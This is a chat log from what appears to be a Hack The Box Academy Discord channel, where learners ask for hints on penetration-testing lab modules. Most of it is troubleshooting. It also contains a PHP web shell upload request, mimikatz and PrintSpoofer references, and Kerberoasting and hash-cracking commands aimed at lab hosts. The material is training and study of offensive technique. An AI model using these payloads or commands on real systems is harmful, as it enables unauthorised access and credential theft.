I went back and finally found something mentioning printspoofer, but it was among two other tools

next bronze
heavy marsh
#

None of them were covered in the module, just mentioned

#

šŸ¤¦ā€ā™‚ļø

fathom pendant
#

probably mentioned in context to priveleges

short hare
#

Stuck on
WINDOWS PRIVILEGE ESCALATION : Credential Hunting
Question:
Search the file system for a file containing a password. Submit the password as your answer.

Tried this [2] as per Hint, but nothing..!
Can anyone give a nudge..

fathom pendant
next bronze
#

it cannot be more obvious

short hare
fathom pendant
#

it just says containing A password

#

doesn't mean that it contains the text "password"

heavy marsh
# next bronze then learn how to use

My problem is I had to resort to a writeup specific to a hackthebox machine, and couldn't just figure it out using the documentation for the tool itself.

#

The docs for the tool didn't even cover using it in the context of an SQL shell

next bronze
short hare
heavy marsh
#

I was able to transfer the files no problem obviously, but the workflow just wasn't there without using extra help.

#

Just a bummer I had to resort to that.

fathom pendant
# next bronze then learn how to use

"We find that we have SeImpersonatePrivelege, which can be leveraged in combination with a tool such as JuicyPotato, PrintSpoofer, or RoguePotato"

#

literally in the text

heavy marsh
#

I know, there just wasn't anything else on how to use PrintSpoofer

heavy marsh
#

At least in the academy module

#

Figured it out though, I guess that's what matters

fathom pendant
short hare
fathom pendant
#

sidenote: love your use of drawings to convey how you feel

#

idk the string lmao i haven't done it

#

but likely you're gonna wanna just first try manually looking around for files

short hare
next bronze
#

try just pass

#

also use powershell, findstr sucks

fathom pendant
#

Get-ChildItem? I think is the thing, but i think powershell has grep aliased to it

next bronze
#

and selectstring

fathom pendant
#

i love that Microsoft was just like "Let's alias all these linux commands to Powershell native commands by default"

next bronze
#

pretty much yeah

fathom pendant
#

also gotta love the CamelCasing

next bronze
#

isn't that: camelCase

#

I'm actually a fan of C naming conventions, looks better compared to python's snake case

fathom pendant
#

Nope CamelCase separates words by the First Letter Of Each Word Capitalized

next bronze
fathom pendant
#

and now i know of kebab-case

fathom pendant
next bronze
#

for programming naming convention it's usually always camelCase

fathom pendant
#

Fine I guess I was referring to Pascal Case

#

šŸ¤“

heavy marsh
#

What module/section went over "lsadump::lsa" command in mimkatz?

fathom pendant
#

likely password attacks

heavy marsh
#

"lsadump::lsa /inject" actually

#

I have the modules saved as .md files and I have checked AD, Password, and Common Services, can't seem to find it

#

Is there a similar command that's covered?

#

It's to get an admin NTLM hash.

#

I guess at this point what I need to ask is, what other tool would have provided the same output, since lsadump::lsa /inject isn't covered explicitly in any module?

#

Is this similar to an lsass dump in powershell and then analysis with pypykatz?!

#

At a glance that's what it seems like.

hasty crane
#

Has anyone done the Windows Attack & Defense module?

short hare
# short hare

@fathom pendant @next bronze
Solved after thinking out of the box..!

Yes findstr sometimes don't show files..!!!

heavy marsh
#

Trying to use a pass the hash on AD Skills Assessment 2 but getting an error

sterile epoch
#

why is powerview throwing this error?

sterile epoch
#

use NT hash only

nova ocean
#

hello guys anyone is doing ad module? i just want to check because i cannot ping, i want to check if there is something wrong, please can anyone helps me?

fathom pendant
#

sometimes machines can't be pinged; but in any case - are you connected to the vpn? do you only have 1 tunX interface (tun0)

#

in-general though you should ask technical support questions to support (green bubble on the website)

nova ocean
fathom pendant
#

ah

#

well; that's because that's an internal network

#

you need to pivot through the spawned target to get to it

#

the vpn only grants you access to the 10.129.x.x network

nova ocean
#

but i am on the machine they gave me at start i need to pviot from there?

fathom pendant
#

wdym "at start"

#

do you mean the spawned target system "10.129.x.x"?

nova ocean
#

i did run the spawn machine 10.10.x.x

fathom pendant
#

10.10.x.x is generally your tun0 iip

#

i'm talking about the big green button "Click Here To Spawn Target"

#

not "Start Instance"

#

"Start Instance" starts the in-browser pwnbox

nova ocean
#

sorry for confusing things but i have just returned back to that module after stopping for long time some of them i have finished i am just recaping from 0

fathom pendant
#

this is what you click to spawn a target system to pivot through

nova ocean
#

now i am in the section initial enumeration of the domain they put me screenshots and commands and start machine not the target its the machine that i use, there i cant use those commands right? i need to spawn target

livid ether
#

hi guys, anyone knows why everytime i try to ssh it gets stuck like before password input? it never finish "loading", ive tried to restart IP, ive changed VPN server and still the same

fathom pendant
#

when they say "start the machine" they mean the target machine

fathom pendant
livid ether
nova ocean
fathom pendant
#

this button spawns the in-browser pwnbox

#

which is NOT the target system, and does NOT have access to the internal target network

nova ocean
#

so maybe this is just introduction here in this section initial enumeration of the domain

nova ocean
fathom pendant
#

i'm now confused as to wtf you're on

#

do NOT run the pwnbox if you're using your own vm and vpn

#

running both the pwnbox and your own vm/vpn will cause issues

#

the ONLY button you need is the "Click here to spawn the target system!" which gives you a foothold to start with

nova ocean
fathom pendant
#

it's not an issue with your kali box

#

it's literally the fact that you CANNOT access the 172.16.x.x network. period

#

without first connecting/setting up a pivot through the foothold target

nova ocean
#

i understand thank u so much

fathom pendant
#

i believe this target/foothold is a linux machine

nova ocean
#

i will check it out and let u know thank u

sterile epoch
#

Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
I know I can do it with bloodhound but I wanna know is there any other way to do it

shadow cradle
#

HI I'm doing the IMAP/POP3 footprinting module, I'm quite stuck trying to find the admin email address. I connected via openssl to the server and tryed to LIST the content of INBOX or the others mailbox but without any luck. May I ask you for an advince or point e in the right direction?

fathom pendant
#

but first you'd need to log in as a user

#

you can't list mailboxes without first logging in

shadow cradle
#

that's was my idea and I did the login, at least i guess šŸ˜… . I'll try to re-do the procedure thank you

fathom pendant
#

{something here} <Command> <args>

tidal kelp
#

On Windows Priv Esc -> Weak Permissions:
was able to elevate privilege and got to the flag by signing out/in. However could only reach flag in GUI not over CMD (gor permissions denied). Any idea how one would reach the flag in cmd?

fathom pendant
#

run cmd as admin?

sterile epoch
tranquil axle
next bronze
sterile epoch
#

did you also use bloodhound for this task?

tranquil axle
#

Bloodhound would be able to show you that information

next bronze
#

yep, don't remember what I used though, it's been a while

tidal kelp
#

lol

#

thought I did, what rookie mistake

#

Thx MarcieLee and olliz0r

lyric sigil
#

Hello

Understanding Log Sources & Investigating with Splunk
Intrusion Detection With Splunk (Real-world Scenario)

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe

actually i am struggle here by this question ,someone can dm me for gave me some hint ?sadge_business

acoustic owl
#

The question says that you should filter for the clr.dll.
Think about which property must also be fulfilled for the call to be suspicious.

astral inlet
#

hi performance problems again ?

#

inthe academy

winter bough
#

Hackthebox is pretty crazy, for me it's way more interesting as tryhackme

remote latch
winter bough
#

You need to challenge yourself sometimes to learn something better

remote latch
short hare
#

Stuck on:
WINDOWS PRIVILEGE ESCALATION: Other Files
Question:
Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.

Tired to find in the way but this is not the answer..!!
Can anyone show me the correct way to solve this?

winter bough
#

It's not that too much hard for new guys that they will be so bad with it

#

I mean, i tried it and not that hard by far

remote latch
winter bough
#

I mean I just started yesterday

remote latch
remote latch
#

not htb

short hare
#

like this
"apple"

remote latch
#

yeah

#

put in quotes the password and put it here in discord

#

so i can see if you make any mistakes

autumn pilot
#

Please don't advise such stuff

remote latch
#

that's clearly the password

#

its prob problem with what he inputs in the website

autumn pilot
#

It definitely is a password, but not the expected one

short hare
next bronze
#

it's not the right password

remote latch
#

i wanna apologize for

short hare
remote latch
agile torrent
#

mb lmao didn't scroll down

gleaming raft
#

Module: Information Gathering - Web Edition
Section Active Infrastructure Identification
Question: Which CMS is used on app.inlanefreight.local? (Format: word)
the solution i am trying to use is
whatweb -a3 app.inlanefreight.local or
whatweb -a3 http://app.inlanefreight.local
getting Error Opening:....
please guide me if i am doing something wrong

minor dome
#

i want to help this server trive

#

give me mod and watch

gleaming raft
# astral inlet what does whatweb do ?

Whatweb recognizes web technologies, including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices

astral inlet
#

can this url point to a ip ?

gleaming raft
astral inlet
#

and di you do manual inspection first ?

gleaming raft
astral inlet
#

can you ping it ?

gleaming raft
agile torrent
#

have you added it to your /etc/hosts?

gleaming raft
#

no

agile torrent
#

that might be an idea

#

as well as any subdomains you have

astral inlet
#

yes

#

a computer is "dumb" you have to tell him what you want

remote latch
astral inlet
#

tbh thats basic knowledge

remote latch
astral inlet
#

šŸ˜„

#

does anyone in here have problems with rdp too ?

hoary pulsar
#

Module : Active & Directory Enumeration/Attacks
Section : LLMNR Poisoning with Linux
Question : Unable to crack the hash using the specific command
Command used : hashcat -m 5600 hash.txt /usr/share/wordlist/rockyou.txt

#

hash[.]txt file content

#

copy pasted it in the Responder Result

tranquil axle
#

from the 3 orange lines in the hashcat output I'd say it thinks it has 4 hashes

#

make sure you remove the newlines at the end of each line

hoary pulsar
#

I'll try thanks

#

This is the result by removing the newlines, my copy paste is weird lol might be skill issue. Pasted it using nano

#

used --show and I found the password, but the output from the module is different from what I did

tranquil axle
#

is the output supposed to be the same? sometimes they use a slightly different environment to test you

hoary pulsar
#

Not really sure about that but I just did the same command in the module tho. But I was expecting this one, not really a big problem as long as I have the result.

tranquil axle
#

that one looks to be for the user forend, yours is for backupagent

hoary pulsar
#

results could differ depending on the user's environment?

tranquil axle
#

I just think you were in a different lab than the explanation in the section. You were supposed to intercept backupagent, they showed you how to intercept another user

broken zephyr
#

Just figured that i need to use a Windows Exploit on a Machine, used bevore another Exploit to get the Salt+Key from it (sadly it doesnt seem to be usefull atm)^^

arctic pulsar
#

Can anyone help me with the command injection module?

harsh tulip
#

hello guys what is the problem in file upload module need help

short hare
#

Stuck on
WINDOWS PRIVILEGE ESCALATION: Further Credential Theft
Question:
Using the techniques covered in this section, retrieve the sa password for the SQL01.inlanefreight.local user account.

I have tried this but seems some thing going wrong..!
This password is not accepted..

#

Really getting tired of this cred hunting

short hare
#

Already getting mad with this module..!
The more i am getting close to finish it, length of each sections are increasing

frozen mesa
#

CROSS-SITE SCRIPTING (XSS) --> skill assessment, whenever i load the rhost, there is nothing on the website, page has no source. Is this correct or is there something wrong?

short hare
urban wadi
#

dont do stuff manually

short hare
urban wadi
#

then just decrypt it with john or hashcat

#

depending on whatever it is

frozen mesa
urban wadi
#

@remote latch thats my main account and im the alt, is there way to link 2 discord accounts to 1 htb labs account?

short hare
#

noted..!

short hare
astral inlet
#

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend <--- where does this user come from ?

soft cedar
astral inlet
#

ok this was yesterday šŸ™‚

#

can anyone send me the hash please ?

next bronze
#

it is encrypted, just that lazagne decrypts it automatically

astral inlet
#

i used pwnbox till today

soft cedar
astral inlet
#

yes please

soft cedar
#

okay lemme check.

next bronze
urban wadi
astral inlet
timid pier
#

Guys I have a doubt, the bug hunter program in htb is good to learning and start hunt?

broken zephyr
#

Why are you in doubt?

timid pier
#

Becoz I never do the academy! I need to know if the course is relevant

fathom pendant
#

It's good to get a start

broken zephyr
#

Well, for sure it is relevant even if it just gives you insight in the most used techniques, the hard part if you ever goanna become a bug bounty hunter is find your own niche and be successfull in it. it is a field wich is hard to get your feed on eitherway.

fathom pendant
#

And basic bounties

timid pier
fathom pendant
#

Some bounties are just "I bothered to look"

#

Before we get off-topic of the channel, there is the #cwes for discussion of the cert btw

#

Other channels can be found by following instructions in #welcome

timid pier
#

like everything in the technology area, right? We always need to delve deeper into topics, etc.

#

Thx guys I will try the BH course there

placid edge
#

Nah this active directory enumeration and attacks skills assesment 2 is killing me. I have a list of users but i cant get the shell. I have a user and a valid password. But cant use it for anything.

Nmap scan looks like this:
||```
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-16 14:43:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

#

Question: Submit the contents of the C:\flag.txt file on MS01.

astral inlet
#

wait a bit catching up šŸ˜‰ . ...ok probably 1-2 days šŸ˜‰

rustic sage
#

Try Smarter

limpid kestrel
placid edge
#

nope

#

this is killing me slowly. been stuck here

short hare
placid edge
#

i've tried kerberoasting, as-rep roasting, password spraying, psexec

placid edge
#

i mean yeah. Thats where i got the list of users from

#

lol might need to

astral inlet
#

please do not spoil i wanna do it too in a few šŸ™‚

fathom pendant
limpid kestrel
astral inlet
#

but you can mask it šŸ™‚

mint lodge
#

would love some help with Skills Assessment - File Upload Attacks
https://academy.hackthebox.com/module/136/section/1310

POST /contact/upload.php HTTP/1.1
Host: 83.136.251.235:57915
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyrV7KO0BoCBuDbTL
Content-Length: 225

------WebKitFormBoundaryyrV7KO0BoCBuDbTL
Content-Disposition: form-data; name="uploadFile"; filename="shell.jpeg"
Content-Type: image/jpeg

<?php system($_REQUEST['cmd']); ?>    
------WebKitFormBoundaryyrV7KO0BoCBuDbTL--

even if i put a valid image i get "Only images are allowed" in the response am i doing something wrong?

ember coral
#

Having a issue with the RDP and SOCKS Tunneling with SocksOverRDP section. When i try to remote the final machine im getting the following Error. i've reset multiple times and keep getting the same error. Any idea what im doing wrong?

#

I occassionally get to log in then get the following (yes i've changed connection to modem)

frozen mesa
#

CROSS-SITE SCRIPTING (XSS) --> Phishing --> document.getElementById('urlform').remove(); is the given example to deface parts of a website but this method does not work. It only seems to add the remove cmd as in plain text on the website.

short hare
ember coral
short hare
ember coral
# short hare Still this issue persists?

My issue is trying to remote the final machine 172.16.6.155. I can get to the first machine run the exe no problem, go back to main machine and check netstat ano and see the connection. I get Profixier loaded and it shows connection to corect machine in it. But cant fully establish the connection to last machine

ember coral
#

yep ****

fathom pendant
#

This section is just touchy at times

ember coral
#

I can occassionally get the connection, then just crashes 😦

short hare
#

As far as I remember this section keeps giving error.

I tired after few hours along with resets and DONE

fathom pendant
#

Are you using the tcp vpn?

ember coral
short hare
ember coral
short hare
fathom pendant
ember coral
#

will do

arctic pulsar
#

I'm working on command injection (blacklist character bypass), can anyone help me find the payload?

arctic pulsar
rapid sparrow
#

you cannot use / right?

arctic pulsar
#

No / is {$PATH:0:1}

rapid sparrow
#

maybe I guess change your payload into base64 and then run it

arctic pulsar
#

I'll try thanks!

cobalt osprey
#

i am doing the subdomain quest in the ffuz module and i am completely clueless, it says that i have to write the complete subdomain name of the "inlanefreight.com" site but i do not know why it is not working

astral inlet
#

ok done for today šŸ™‚

arctic pulsar
#

And if I put IFS after the path I do get output

frozen mesa
#

DM?

arctic pulsar
#

Yes please!

lusty thicket
cobalt osprey
#

i am doing the subdomain quest in the ffuz module and i am completely clueless, it says that i have to write the complete subdomain name of the "inlanefreight.com" site but i do not know why it is not working
i used the ffuf command and i just found 3 subdomains but when i write them into the site it says that i am wrong

drifting urchin
#

anyone else having vpn issue atm, pwnbox working however on the VM can't connect to the VPN?

ember coral
#

Well TCP connection helped a bit, but got here and just freezes 😦

winter bough
#

is there somewhere good tutorial how to make a VM working with the hack the box?

#

if I wanted to after subscription for example

winter bough
#

and if I want to use kali?

acoustic owl
#

then do the same, but just with kali iso

ember coral
#

Well progress, ish lmao any other suggestions to make it more stable?

rapid sparrow
astral inlet
#

xfree works flawless , rdp is laggy, i had to reconnect with rdp 5-10 times

ember coral
#

to clarify this is a rdp with a rdp, for the lab lol. I can rdp foot hold fine

astral inlet
#

pivoting ?

ember coral
# astral inlet pivoting ?

yes its trying RDP and SOCKS Tunneling with SocksOverRDP section. its set up correctly but trying to rdp the second machine refuses to get stable connection. Just load sslow as hell till it freezes/errors

astral inlet
#

this part was pita,

winter bough
ember coral
acoustic owl
#

just download the ovpn file

winter bough
sterile epoch
#

why is it like this in pwnbox?

astral inlet
ember coral
#

just the module

sterile epoch
#

did not start it I guess do you know the creds?

acoustic owl
astral inlet
astral inlet
astral inlet
winter bough
harsh path
#

Can someone DM regarding Assembly Language - Skill assessment task 2?

"Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag. (Feel free to find/create a custom shellcode)"

I have the code optimize by using lowest registers and removed exit call and connected to server but keeps failing and i dont know why

acoustic owl
sterile epoch
#

what is the password for bloodhound in the doc it says neo4j:BloodHound

#

I started neo4j

#

the default creds are not working

winter bough
astral inlet
#

try neo4j/neo4j

sterile epoch
#

it worked

acoustic owl
potent thorn
#

hi folks Im currently doing the shells & paylaods skills assessment. I managed to finish the section with the metasploit exploit, but I wanted to try to do the manual exploit. Ive managed to get the nishang webshell but unsure where to go from there. any hints?

sterile epoch
#

its been 5 minutes like this is this supposed to take this much time because previous targets imported really quick

astral inlet
#

it depends on the BH version

sterile epoch
#

does the htb bloodhound module uses legacy or the community one?

#

I guess I gotta try that on my local

oblique spoke
#

Hey fellas ! i got a littlebit stucked on logrotate htb academy linux priviledge escalation

#

can someone please help?

snow ridge
#

Hello, can someone give me hints for Intro to whitebox pentesting skills assessment? I have located a possible injection point, but I just can't get a working payload. You can DM me, and I can provide more information.

tranquil axle
potent thorn
primal drift
#

Guys, does it mean someone used my reflink and bought sub?

oblique spoke
#

Hey! i cant find what logfile to rotate for priviledge escalation. Can someone please help me?

acoustic owl
oblique spoke
#

šŸ˜„ it was nnice

oblique spoke
acoustic owl
oblique spoke
#

alright thank you

lusty hearth
#

Can someone help me with the module HTTP Attacks : TE.CL lab?
I think I got the correct TE header, but my payload is off somehow and I am not sure where.

mint lodge
#

@lusty hearth did you do eWPTv2? or v1?

#

sorry for tagging